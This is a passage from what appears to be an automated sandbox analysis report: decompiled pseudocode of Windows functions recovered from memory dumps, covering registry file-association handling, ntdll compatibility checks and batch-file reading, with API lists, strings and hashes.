                                                      0x4a751693
                                                      0x4a75162d

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: callocmemcpywcschr$qsort
                                                      • String ID: &()[]{}^=;!%'+,`~
                                                      • API String ID: 1104559731-381716982
                                                      • Opcode ID: 8b5a709522340c0bdd53a099d22d7c9ac7146a7f172bd515a21bb05791daa090
                                                      • Instruction ID: b2e2cea4fbd06007646ad1a75b6cf35dbc624e60fb64cec1ec4381861ceeeef1
                                                      • Opcode Fuzzy Hash: 8b5a709522340c0bdd53a099d22d7c9ac7146a7f172bd515a21bb05791daa090
                                                      • Instruction Fuzzy Hash: EDB1257A909249EFDB30DFA8C880ADDBBB1FF04355F12446AE905EB651D730AE49CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 78%
                                                      			E4A74DB5E(void* _a4, intOrPtr* _a8, int _a12) {
                                                      				signed int _v8;
                                                      				short _v528;
                                                      				intOrPtr* _v532;
                                                      				void* _v536;
                                                      				int _v540;
                                                      				void* _v544;
                                                      				long _v548;
                                                      				signed int _v552;
                                                      				int _v556;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t42;
                                                      				intOrPtr* _t45;
                                                      				signed int _t48;
                                                      				signed short* _t59;
                                                      				int _t62;
                                                      				int _t71;
                                                      				long _t78;
                                                      				signed short _t80;
                                                      				intOrPtr _t86;
                                                      				char* _t87;
                                                      				void* _t93;
                                                      				void* _t96;
                                                      				char _t97;
                                                      				int _t99;
                                                      				char* _t100;
                                                      				signed short* _t102;
                                                      				signed int _t105;
                                                      
                                                      				_t42 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t42 ^ _t105;
                                                      				_v544 = _a4;
                                                      				_t45 = _a8;
                                                      				_v532 = _t45;
                                                      				_v540 = _a12;
                                                      				_t96 = _t45 + 2;
                                                      				do {
                                                      					_t86 =  *_t45;
                                                      					_t45 = _t45 + 2;
                                                      				} while (_t86 != 0);
                                                      				_t87 = L"\\Shell\\Open\\Command";
                                                      				_t48 = _t45 - _t96 >> 1;
                                                      				_t100 =  &(_t87[2]);
                                                      				do {
                                                      					_t97 =  *_t87;
                                                      					_t87 =  &(_t87[2]);
                                                      				} while (_t97 != 0);
                                                      				_t90 = _t87 - _t100 >> 1;
                                                      				if((_t87 - _t100 >> 1) + _t48 + 1 <= 0x104) {
                                                      					E4A73185A( &_v528, 0x104, _v532);
                                                      					E4A7320A9(0x104,  &_v528, 0x104, L"\\Shell\\Open\\Command");
                                                      					_t99 = 0x2000000;
                                                      					_t102 = RegOpenKeyExW(_v544,  &_v528, 0, 0x2000000,  &_v536);
                                                      					if(_t102 == 0) {
                                                      						L18:
                                                      						_t99 = _v540;
                                                      						if(_t99 == 0 ||  *_t99 == 0) {
                                                      							_t102 = RegDeleteValueW(_v536, 0);
                                                      							if(_t102 != 0) {
                                                      								E4A736D44(_t90, 0x400023a5, 1, _v532);
                                                      								goto L27;
                                                      							}
                                                      						} else {
                                                      							_t62 = _t99;
                                                      							_t97 = _t62 + 2;
                                                      							do {
                                                      								_t93 =  *_t62;
                                                      								_t62 = _t62 + 2;
                                                      							} while (_t93 != 0);
                                                      							_t102 = RegSetValueExW(_v536, E4A733AFC, 0, 2, _t99, (_t62 - _t97 >> 1) + (_t62 - _t97 >> 1) + 2);
                                                      							if(_t102 != 0) {
                                                      								_push(0);
                                                      								_push(_t102);
                                                      								E4A736D44(_t93);
                                                      								E4A736D44(_t93, 0x235d, 1, _v532);
                                                      							} else {
                                                      								_push(_t99);
                                                      								E4A7358F3(L"%s=%s\r\n", _v532);
                                                      								L27:
                                                      							}
                                                      						}
                                                      						RegCloseKey(_v536);
                                                      						goto L29;
                                                      					} else {
                                                      						_t71 = _v540;
                                                      						if(_t71 == 0 ||  *_t71 == 0) {
                                                      							E4A736D44(_t90, 0x400023a5, 1, _v532);
                                                      							L29:
                                                      							_t59 = _t102;
                                                      						} else {
                                                      							_t102 =  &_v528;
                                                      							L12:
                                                      							while(1) {
                                                      								while( *_t102 != 0) {
                                                      									if( *_t102 != 0x5c) {
                                                      										_t102 =  &(_t102[1]);
                                                      										continue;
                                                      									}
                                                      									break;
                                                      								}
                                                      								_v552 =  *_t102 & 0x0000ffff;
                                                      								 *_t102 = 0;
                                                      								_t78 = RegCreateKeyExW(_v544,  &_v528, 0, 0, 0, _t99, 0,  &_v536,  &_v556);
                                                      								_v548 = _t78;
                                                      								if(_t78 != 0) {
                                                      									E4A736D44(_t90, 0x400023a5, 1, _v532);
                                                      									_t59 = _v548;
                                                      								} else {
                                                      									_t80 = _v552;
                                                      									if(_t80 == 0) {
                                                      										goto L18;
                                                      									} else {
                                                      										 *_t102 = _t80;
                                                      										_t102 =  &(_t102[1]);
                                                      										RegCloseKey(_v536);
                                                      										continue;
                                                      									}
                                                      								}
                                                      								goto L30;
                                                      							}
                                                      						}
                                                      					}
                                                      				} else {
                                                      					_push(0);
                                                      					_push(0x400023db);
                                                      					E4A736D44(_t90);
                                                      					_t59 = 1;
                                                      				}
                                                      				L30:
                                                      				return E4A7313A9(_t59, 0, _v8 ^ _t105, _t97, _t99, _t102);
                                                      			}
                                                      0x4a74dc32
                                                      0x4a74dbc9
                                                      0x4a74dbc9
                                                      0x4a74dbca
                                                      0x4a74dbcf
                                                      0x4a74dbd8
                                                      0x4a74dbd8
                                                      0x4a74dd95
                                                      0x4a74dda3

                                                      APIs
                                                      • RegOpenKeyExW.KERNEL32 ref: 4A74DC1A
                                                      • RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,02000000,00000000,?,?), ref: 4A74DC84
                                                      • RegCloseKey.KERNEL32(?), ref: 4A74DCAA
                                                      • RegSetValueExW.KERNEL32 ref: 4A74DD22
                                                      • RegDeleteValueW.KERNEL32 ref: 4A74DD66
                                                      • RegCloseKey.KERNEL32(?), ref: 4A74DD8D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: CloseValue$CreateDeleteOpen
                                                      • String ID: %s=%s$\Shell\Open\Command
                                                      • API String ID: 4081037667-3301834661
                                                      • Opcode ID: e96f8c201bdb7c1c27ae0e1608cbfbe6c0b129faf82d0e0ba87b38151e2c8d43
                                                      • Instruction ID: c663ff58791dcc5e7254199019741911604ee2a8617304a36947bd3e020d8423
                                                      • Opcode Fuzzy Hash: e96f8c201bdb7c1c27ae0e1608cbfbe6c0b129faf82d0e0ba87b38151e2c8d43
                                                      • Instruction Fuzzy Hash: BD51B772904129BFDF31AF54CC8CEEA7BB9EB49300F1244D9E689A7142D6718E89CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 64%
                                                      			E02387EFD(void* __ecx, intOrPtr _a4) {
                                                      				signed int _v8;
                                                      				char _v540;
                                                      				unsigned int _v544;
                                                      				signed int _v548;
                                                      				intOrPtr _v552;
                                                      				char _v556;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t33;
                                                      				void* _t38;
                                                      				unsigned int _t46;
                                                      				unsigned int _t47;
                                                      				unsigned int _t52;
                                                      				intOrPtr _t56;
                                                      				unsigned int _t62;
                                                      				void* _t69;
                                                      				void* _t70;
                                                      				intOrPtr _t72;
                                                      				signed int _t73;
                                                      				void* _t74;
                                                      				void* _t75;
                                                      				void* _t76;
                                                      				void* _t77;
                                                      
                                                      				_t33 =  *0x2432088; // 0x76b1a062
                                                      				_v8 = _t33 ^ _t73;
                                                      				_v548 = _v548 & 0x00000000;
                                                      				_t72 = _a4;
                                                      				if(E02387F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                      					__eflags = _v548;
                                                      					if(_v548 == 0) {
                                                      						goto L1;
                                                      					}
                                                      					_t62 = _t72 + 0x24;
                                                      					E023A3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                      					_t71 = 0x214;
                                                      					_v544 = 0x214;
                                                      					E0235DFC0( &_v540, 0, 0x214);
                                                      					_t75 = _t74 + 0x20;
                                                      					_t46 =  *0x2434218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                      					__eflags = _t46;
                                                      					if(_t46 == 0) {
                                                      						goto L1;
                                                      					}
                                                      					_t47 = _v544;
                                                      					__eflags = _t47;
                                                      					if(_t47 == 0) {
                                                      						goto L1;
                                                      					}
                                                      					__eflags = _t47 - 0x214;
                                                      					if(_t47 >= 0x214) {
                                                      						goto L1;
                                                      					}
                                                      					_push(_t62);
                                                      					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                      					E023A3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                      					_t52 = E02360D27( &_v540, L"Execute=1");
                                                      					_t76 = _t75 + 0x1c;
                                                      					_push(_t62);
                                                      					__eflags = _t52;
                                                      					if(_t52 == 0) {
                                                      						E023A3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                      						_t71 =  &_v540;
                                                      						_t56 = _t73 + _v544 - 0x218;
                                                      						_t77 = _t76 + 0x14;
                                                      						_v552 = _t56;
                                                      						__eflags = _t71 - _t56;
                                                      						if(_t71 >= _t56) {
                                                      							goto L1;
                                                      						} else {
                                                      							goto L10;
                                                      						}
                                                      						while(1) {
                                                      							L10:
                                                      							_t62 = E02368375(_t71, 0x20);
                                                      							_pop(_t69);
                                                      							__eflags = _t62;
                                                      							if(__eflags != 0) {
                                                      								__eflags = 0;
                                                      								 *_t62 = 0;
                                                      							}
                                                      							E023A3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                      							_t77 = _t77 + 0x10;
                                                      							E023CE8DB(_t69, _t70, __eflags, _t72, _t71);
                                                      							__eflags = _t62;
                                                      							if(_t62 == 0) {
                                                      								goto L1;
                                                      							}
                                                      							_t31 = _t62 + 2; // 0x2
                                                      							_t71 = _t31;
                                                      							__eflags = _t71 - _v552;
                                                      							if(_t71 >= _v552) {
                                                      								goto L1;
                                                      							}
                                                      						}
                                                      					}
                                                      					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                      					_push(3);
                                                      					_push(0x55);
                                                      					E023A3F92();
                                                      					_t38 = 1;
                                                      					L2:
                                                      					return E0235E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                      				}
                                                      				L1:
                                                      				_t38 = 0;
                                                      				goto L2;
                                                      			}

                                                      APIs
                                                      • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 023A3F12
                                                      Strings
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 023AE345
                                                      • Execute=1, xrefs: 023A3F5E
                                                      • ExecuteOptions, xrefs: 023A3F04
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 023A3F75
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 023A3F4A
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 023AE2FB
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 023A3EC4
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true
                                                      • Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: BaseDataModuleQuery
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 3901378454-484625025
                                                      • Opcode ID: 269396f5dfcab413ab374e39929c959886cf9aae6ad4a8b5cb2fb4b243cff57d
                                                      • Instruction ID: f8b412bf4b29e58913eb961f6c48abbb73d2215a427369297d0c6f79c91d3738
                                                      • Opcode Fuzzy Hash: 269396f5dfcab413ab374e39929c959886cf9aae6ad4a8b5cb2fb4b243cff57d
                                                      • Instruction Fuzzy Hash: 0E41D83268031C7AEB30EA94DCD9FEBB3BDAB54704F1444A9E909E6081E770DA458F61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 39%
                                                      			E4A731A1A(void* __ecx, void* __eflags) {
                                                      				signed int _v8;
                                                      				long _v12;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				void* _t46;
                                                      				intOrPtr _t48;
                                                      				signed int _t51;
                                                      				intOrPtr* _t54;
                                                      				intOrPtr _t60;
                                                      				void* _t61;
                                                      				signed int _t62;
                                                      				signed int _t66;
                                                      				signed int _t67;
                                                      				signed int _t68;
                                                      				intOrPtr* _t70;
                                                      				intOrPtr* _t74;
                                                      				signed int _t78;
                                                      				void* _t80;
                                                      				void* _t83;
                                                      				signed int _t85;
                                                      				signed int _t92;
                                                      				short _t94;
                                                      				long _t95;
                                                      				signed int _t96;
                                                      				signed int* _t97;
                                                      				void* _t98;
                                                      				long _t100;
                                                      				signed int _t101;
                                                      				signed int* _t104;
                                                      				signed int _t105;
                                                      				long _t106;
                                                      				signed int _t108;
                                                      				signed int _t111;
                                                      				signed int _t112;
                                                      				intOrPtr _t115;
                                                      				void* _t116;
                                                      				void* _t119;
                                                      				void* _t122;
                                                      				void* _t124;
                                                      				short* _t125;
                                                      				short* _t133;
                                                      				short _t134;
                                                      				intOrPtr* _t135;
                                                      				void* _t140;
                                                      				void* _t141;
                                                      				void* _t142;
                                                      				void* _t146;
                                                      				void* _t157;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_t108);
                                                      				_push(_t130);
                                                      				E4A731E6C(_t46);
                                                      				_t48 =  *0x4a754194; // 0x0
                                                      				_t111 =  *0x4a7541a0; // 0x0
                                                      				 *0x4a76c640 =  *((intOrPtr*)(_t48 - 2));
                                                      				_t51 = _t111 & 0x00000003;
                                                      				if(_t51 == 1) {
                                                      					 *0x4a770642 = 0;
                                                      					E4A73185A(0x4a76c642, 0x2002,  *0x4a75419c);
                                                      					_t54 = 0x4a76c642;
                                                      					_t18 = _t54 + 2; // 0x4a76c644
                                                      					_t122 = _t18;
                                                      					_t108 = 0;
                                                      					__eflags = 0;
                                                      					goto L25;
                                                      					L23:
                                                      					 *0x4a754194 = 0x4a76c642;
                                                      					E4A731EC6(_t108, _t111, 0x4a76c642, _t130);
                                                      					_t60 =  *0x4a754194; // 0x0
                                                      					 *0x4a754190 = _t60;
                                                      					return _t60;
                                                      					L25:
                                                      					_t112 =  *_t54;
                                                      					_t54 = _t54 + 2;
                                                      					__eflags = _t112;
                                                      					if(_t112 != 0) {
                                                      						goto L25;
                                                      					} else {
                                                      						_t111 =  *0x4a75419c; // 0x0
                                                      						 *0x4a75419c = _t111 + (_t54 - _t122 >> 1) * 2;
                                                      						goto L23;
                                                      					}
                                                      				}
                                                      				_t2 = _t51 - 2; // -2
                                                      				_t123 = _t2;
                                                      				if(_t2 > 1) {
                                                      					goto L23;
                                                      				}
                                                      				_t108 = 0;
                                                      				if(_t51 == 2) {
                                                      					L36:
                                                      					__eflags = 0x00008000 & _t111;
                                                      					if(__eflags != 0) {
                                                      						_push(_t108);
                                                      						_t51 = E4A7399E1(_t111);
                                                      						_t111 = 0x2352;
                                                      					} else {
                                                      						_t51 = E4A73C60C(_t108, _t123, 0x4a76c642, 0x8000, __eflags);
                                                      						 *0x4a7541a0 =  *0x4a7541a0 | 0x00008000;
                                                      					}
                                                      					L4:
                                                      					_t61 = E4A731E6C(_t51);
                                                      					_t133 = 0x4a75c640;
                                                      					_t141 =  *0x4a75419c - _t108; // 0x0
                                                      					if(_t141 == 0) {
                                                      						_t62 = E4A736BEA(_t61, _t108);
                                                      						__eflags = _t62;
                                                      						if(_t62 != 0) {
                                                      							L46:
                                                      							_v8 = _t108;
                                                      							while(1) {
                                                      								__imp___get_osfhandle( &_v12);
                                                      								_t66 = E4A734D9A(0x4a75c640 + _v8 * 2,  *0x4a75419c, 0x4a75c640 + _v8 * 2, 1);
                                                      								__eflags = _t66;
                                                      								if(_t66 != 0) {
                                                      									goto L49;
                                                      								}
                                                      								_t95 = GetLastError();
                                                      								__eflags = _t95 - 0xea;
                                                      								if(_t95 != 0xea) {
                                                      									L9:
                                                      									_t68 =  *0x4a75419c; // 0x0
                                                      									if(_v8 == _t108) {
                                                      										__eflags = _t68 - _t108;
                                                      										if(_t68 != _t108) {
                                                      											goto L10;
                                                      										}
                                                      										_t92 = E4A733B03(_t68, _t111, _t108);
                                                      										__eflags = _t92;
                                                      										if(_t92 != 0) {
                                                      											__eflags =  *0x4a77066c - _t108; // 0x0
                                                      											if(__eflags == 0) {
                                                      												goto L29;
                                                      											}
                                                      											_v8 = _v8 + 1;
                                                      											_t94 = 0xa;
                                                      											 *0x4a75c640 = _t94;
                                                      											L13:
                                                      											E4A734B3D(0x4a76c642, 0x2002, _t133, _v8);
                                                      											_t70 = 0x4a76c642;
                                                      											_t9 = _t70 + 2; // 0x4a76c644
                                                      											_t124 = _t9;
                                                      											goto L14;
                                                      											do {
                                                      												L16:
                                                      												_t123 =  *_t74;
                                                      												_t74 = _t74 + 2;
                                                      											} while (_t123 != _t108);
                                                      											_t130 = _t74 - _t116 >> 1;
                                                      											_t78 = E4A731996(0x4a76c642, E4A731BBC);
                                                      											_t111 = _v8;
                                                      											_v12 = _t78;
                                                      											if(_t78 >= _t74 - _t116 >> 1) {
                                                      												__eflags = _t111 - _t108;
                                                      												if(_t111 == _t108) {
                                                      													goto L18;
                                                      												}
                                                      												__eflags = _t78 - 0x2000;
                                                      												if(_t78 < 0x2000) {
                                                      													goto L23;
                                                      												}
                                                      												__eflags =  *0x4a754174 - 3;
                                                      												_t133 = 0x233f;
                                                      												L69:
                                                      												if(__eflags == 0) {
                                                      													__eflags =  *0x4a75408c - 1;
                                                      													if(__eflags == 0) {
                                                      														E4A73C60C(_t108, _t123, 0x4a76c642, _t133, __eflags);
                                                      														E4A7358F3();
                                                      														 *_t135 = 0x4a7545a8;
                                                      														E4A7358F3();
                                                      														_t111 = 0x4a76c642;
                                                      													}
                                                      													_push(_t108);
                                                      													E4A736D44(_t111);
                                                      													_t111 = _t133;
                                                      													E4A74FCA6(_t108, _t111, _t123, 0x4a76c642, _t133);
                                                      												}
                                                      												_push(_t108);
                                                      												_t83 = E4A736D44(_t111);
                                                      												_t119 = _t133;
                                                      												__eflags =  *0x4a75419c - _t108; // 0x0
                                                      												if(__eflags == 0) {
                                                      													_t85 = E4A733B03(_t83, _t119, _t108);
                                                      													__eflags = _t85;
                                                      													if(_t85 != 0) {
                                                      														E4A750175(_t108, _t123);
                                                      													}
                                                      												}
                                                      												L61:
                                                      												__imp__longjmp(0x4a754ac0, 0xffffffff);
                                                      												L62:
                                                      												E4A7358F3();
                                                      												_pop(_t111);
                                                      												L8:
                                                      												_v12 = _t108;
                                                      												goto L9;
                                                      											}
                                                      											L18:
                                                      											_t125 = 0x4a76c642 + _t78 * 2;
                                                      											if( *_t125 == 0x1a) {
                                                      												_t134 = 0xa;
                                                      												 *_t125 = _t134;
                                                      											}
                                                      											if( *_t125 != 0xa) {
                                                      												_t130 = 0;
                                                      												_v12 = 2;
                                                      											} else {
                                                      												_t125 = _t125 + 2;
                                                      												_t130 = _t111;
                                                      												_v12 = 1;
                                                      											}
                                                      											 *_t125 = 0;
                                                      											_t80 = E4A733B03(0, _t111,  *0x4a75419c);
                                                      											if(_t80 == 0) {
                                                      												_t130 =  ~_t130;
                                                      												__imp___get_osfhandle( *0x4a75419c, _t130, _t108, _v12);
                                                      												_pop(_t111);
                                                      												SetFilePointer(_t80, ??, ??, ??);
                                                      												_t157 =  *0x4a75419c - _t108; // 0x0
                                                      												if(_t157 == 0) {
                                                      													__eflags =  *0x4a7706ac - _t108; // 0x0
                                                      													if(__eflags == 0) {
                                                      														E4A73C5A0(0x4a76c642);
                                                      													}
                                                      												}
                                                      											}
                                                      											goto L23;
                                                      											L14:
                                                      											_t115 =  *_t70;
                                                      											_t70 = _t70 + 2;
                                                      											if(_t115 != _t108) {
                                                      												goto L14;
                                                      											} else {
                                                      												_v8 = _t70 - _t124 >> 1;
                                                      												_t74 = 0x4a76c642;
                                                      												_t11 = _t74 + 2; // 0x4a76c644
                                                      												_t116 = _t11;
                                                      												goto L16;
                                                      											}
                                                      										}
                                                      										L29:
                                                      										_push(2);
                                                      										E4A743787(_t111, 0x4a76c642, _t133);
                                                      										goto L69;
                                                      									}
                                                      									L10:
                                                      									_t146 =  *0x4a77066c - _t108; // 0x0
                                                      									if(_t146 == 0 && _v8 != _t108 && _t68 == _t108) {
                                                      										 *0x4a77066c = 1;
                                                      									}
                                                      									goto L13;
                                                      								}
                                                      								L49:
                                                      								__eflags = _v12 - _t108;
                                                      								if(_v12 != _t108) {
                                                      									_v8 = _v8 + 1;
                                                      									_t67 = _v8;
                                                      									__eflags =  *((short*)(0x4a75c63e + _t67 * 2)) - 0xa;
                                                      									if( *((short*)(0x4a75c63e + _t67 * 2)) != 0xa) {
                                                      										__eflags = _t67 - 0x2000;
                                                      										if(_t67 >= 0x2000) {
                                                      											goto L9;
                                                      										}
                                                      										continue;
                                                      									}
                                                      									goto L9;
                                                      								}
                                                      								goto L9;
                                                      							}
                                                      						}
                                                      						_t96 = E4A733B03(_t62, _t111, _t108);
                                                      						__eflags = _t96;
                                                      						if(_t96 == 0) {
                                                      							L41:
                                                      							__eflags =  *0x4a75419c - _t108; // 0x0
                                                      							if(__eflags != 0) {
                                                      								goto L5;
                                                      							}
                                                      							_t101 = E4A733B03(_t96, _t111, _t108);
                                                      							__eflags = _t101;
                                                      							if(_t101 == 0) {
                                                      								goto L5;
                                                      							}
                                                      							__eflags =  *0x4a754154 & 0x00000001;
                                                      							if(( *0x4a754154 & 0x00000001) == 0) {
                                                      								goto L5;
                                                      							}
                                                      							__eflags =  *0x4a7706bc - _t108; // 0x0
                                                      							if(__eflags != 0) {
                                                      								_t100 = E4A74E87B( &_v8,  *0x4a75419c, _t133, 0x2000,  &_v8);
                                                      								L34:
                                                      								_v12 = _t100;
                                                      								goto L9;
                                                      							}
                                                      							E4A731E6C(_t101);
                                                      							_t104 =  &_v8;
                                                      							__imp___get_osfhandle( *0x4a75419c, _t133, 0x2000, _t104);
                                                      							_pop(_t111);
                                                      							_push(_t104);
                                                      							_t105 = E4A7434E2();
                                                      							__eflags = _t105;
                                                      							if(_t105 == 0) {
                                                      								L33:
                                                      								_v8 = _t108;
                                                      								_t100 = GetLastError();
                                                      								goto L34;
                                                      							} else {
                                                      								__eflags = _v8 - _t108;
                                                      								if(_v8 != _t108) {
                                                      									goto L8;
                                                      								}
                                                      								_t106 = GetLastError();
                                                      								_push(0x4a7545a8);
                                                      								__eflags = _t106 - 0x3e3;
                                                      								if(_t106 != 0x3e3) {
                                                      									goto L62;
                                                      								}
                                                      								E4A7358F3();
                                                      								goto L61;
                                                      							}
                                                      							goto L46;
                                                      						}
                                                      						__eflags =  *0x4a754154 & 0x00000001;
                                                      						if(( *0x4a754154 & 0x00000001) == 0) {
                                                      							goto L46;
                                                      						}
                                                      						goto L41;
                                                      					}
                                                      					L5:
                                                      					_t97 =  &_v8;
                                                      					__imp___get_osfhandle( *0x4a75419c, _t133, 0x2000, _t97);
                                                      					_pop(_t111);
                                                      					_push(_t97);
                                                      					_t98 = E4A734D9A();
                                                      					_t142 =  *0x4a7541b4 - _t108; // 0x0
                                                      					if(_t142 != 0) {
                                                      						E4A731E6C(_t98);
                                                      						goto L61;
                                                      					}
                                                      					if(_t98 == _t108 || _v8 <= _t108) {
                                                      						goto L33;
                                                      					} else {
                                                      						goto L8;
                                                      					}
                                                      				}
                                                      				_t140 =  *0x4a75419c - _t108; // 0x0
                                                      				if(_t140 == 0) {
                                                      					goto L36;
                                                      				}
                                                      				goto L4;
                                                      			}





















































                                                      0x4a74346d
                                                      0x4a74346d
                                                      0x4a743473
                                                      0x00000000
                                                      0x00000000
                                                      0x4a74347a
                                                      0x4a74347f
                                                      0x4a743481
                                                      0x00000000
                                                      0x00000000
                                                      0x4a743487
                                                      0x4a74348e
                                                      0x00000000
                                                      0x00000000
                                                      0x4a743494
                                                      0x4a74349a
                                                      0x4a743666
                                                      0x4a7357cb
                                                      0x4a7357cb
                                                      0x00000000
                                                      0x4a7357cb
                                                      0x4a7434a0
                                                      0x4a7434a5
                                                      0x4a7434b5
                                                      0x4a7434bb
                                                      0x4a7434bc
                                                      0x4a7434bd
                                                      0x4a743670
                                                      0x4a743672
                                                      0x4a7357c2
                                                      0x4a7357c2
                                                      0x4a7357c5
                                                      0x00000000
                                                      0x4a743678
                                                      0x4a743678
                                                      0x4a74367b
                                                      0x00000000
                                                      0x00000000
                                                      0x4a743681
                                                      0x4a743687
                                                      0x4a74368c
                                                      0x4a743691
                                                      0x00000000
                                                      0x00000000
                                                      0x4a743693
                                                      0x00000000
                                                      0x4a743698
                                                      0x00000000
                                                      0x4a743672
                                                      0x4a743460
                                                      0x4a743467
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x4a743467
                                                      0x4a731a8a
                                                      0x4a731a8a
                                                      0x4a731a9a
                                                      0x4a731aa0
                                                      0x4a731aa1
                                                      0x4a731aa2
                                                      0x4a731aa7
                                                      0x4a731aad
                                                      0x4a7436b1
                                                      0x00000000
                                                      0x4a7436b1
                                                      0x4a731ab5
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x4a731ab5
                                                      0x4a731a68
                                                      0x4a731a6e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      APIs
                                                        • Part of subcall function 4A731E6C: EnterCriticalSection.KERNEL32(4A73851C), ref: 4A731E72
                                                        • Part of subcall function 4A731E6C: LeaveCriticalSection.KERNEL32(?,4A731DBC,?,00000021,-00000003,4A768640,4A754210,00000000,00000000,?,4A731CE6,4A768640,4A754210,4A754210,?,4A731C8D), ref: 4A731E85
                                                      • _get_osfhandle.MSVCRT ref: 4A731B87
                                                      • SetFilePointer.KERNEL32(00000000,4A731DBC,?,00000021,-00000003,4A768640,4A754210,00000000,00000000,?,4A731CE6,4A768640,4A754210,4A754210,?,4A731C8D), ref: 4A731B8F
                                                      • GetLastError.KERNEL32(00000000,4A731E56,4A731F9D,-00000003,4A754210,4A754210,?,4A731DBC,?,00000021,-00000003,4A768640,4A754210,00000000,00000000), ref: 4A7357C5
                                                      • _get_osfhandle.MSVCRT ref: 4A731A9A
                                                        • Part of subcall function 4A734D9A: SetFilePointer.KERNEL32(4A754210,00000000,00000000,00000001,4A76C642,4A75C640,00000000), ref: 4A734DB5
                                                        • Part of subcall function 4A734D9A: ReadFile.KERNEL32(4A754210,4A756640,00000000,?,00000000), ref: 4A734DDD
                                                        • Part of subcall function 4A734D9A: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,4A756640,4A754210,00000006,?), ref: 4A734E54
                                                      • _get_osfhandle.MSVCRT ref: 4A7434B5
                                                      • GetLastError.KERNEL32(00000000,4A731E56,4A731F9D,-00000003,4A754210,4A754210,?,4A731DBC,?,00000021,-00000003,4A768640,4A754210,00000000,00000000), ref: 4A743681
                                                      • longjmp.MSVCRT(4A754AC0,000000FF,4A76C642,4A731BBC,4A76C642,00002002,4A75C640,00000000,00000000,4A731E56,4A731F9D,-00000003,4A754210,4A754210,?,4A731DBC), ref: 4A7436A0
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: File_get_osfhandle$CriticalErrorLastPointerSection$ByteCharEnterLeaveMultiReadWidelongjmp
                                                      • String ID:
                                                      • API String ID: 3667609627-0
                                                      • Opcode ID: 14ead1c82f12114f676a43e1aa5c861dc8ac705eaa42eeb0c3e2eb7b3efea718
                                                      • Instruction ID: eeab2a0484ae9e0fb0a7e2a1060df1aa1a73f9e17404cf0bc66d3f99cf526304
                                                      • Opcode Fuzzy Hash: 14ead1c82f12114f676a43e1aa5c861dc8ac705eaa42eeb0c3e2eb7b3efea718
